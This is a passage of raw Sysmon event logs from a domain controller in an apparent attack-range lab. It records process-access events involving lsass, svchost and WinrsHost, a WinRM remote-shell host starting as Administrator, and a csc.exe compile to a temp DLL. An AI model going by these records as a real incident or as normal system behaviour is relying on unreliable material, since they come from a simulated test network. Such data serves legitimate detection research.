08:40:24.837{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000177Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.837{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000176Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.837{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000175Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.837{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000174Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.837{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000173Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.837{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000172Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.837{5D479F2C-14FE-5F84-0500-000000007E01}640760C:\Windows\system32\csrss.exe{5D479F2C-1678-5F84-FE02-000000007E01}4236C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000171Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.837{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1678-5F84-FE02-000000007E01}4236C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000170Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.839{5D479F2C-1678-5F84-FE02-000000007E01}4236C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{5D479F2C-1678-5F84-7C8C-110000000000}0x118c7c0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{5D479F2C-1506-5F84-0C00-000000007E01}572C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000169Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.837{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000168Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.837{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000167Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.821{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000166Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.743{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000165Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.743{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000164Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.743{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000163Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.743{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000162Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.743{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000161Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.743{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x8000000000000000160Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.localDLL2020-10-12 08:40:24.352{5D479F2C-1678-5F84-FC02-000000007E01}4296C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\bqwsc4ag.dll2020-10-12 08:40:24.227 10341000x8000000000000000159Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.352{5D479F2C-1677-5F84-F702-000000007E01}43642676C:\Windows\system32\conhost.exe{5D479F2C-1678-5F84-FD02-000000007E01}4140C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000158Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.352{5D479F2C-14FE-5F84-0500-000000007E01}6402464C:\Windows\system32\csrss.exe{5D479F2C-1678-5F84-FD02-000000007E01}4140C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000157Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.352{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000156Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.352{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000155Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.352{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000154Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.352{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000153Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.352{5D479F2C-1678-5F84-FC02-000000007E01}42961504C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{5D479F2C-1678-5F84-FD02-000000007E01}4140C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.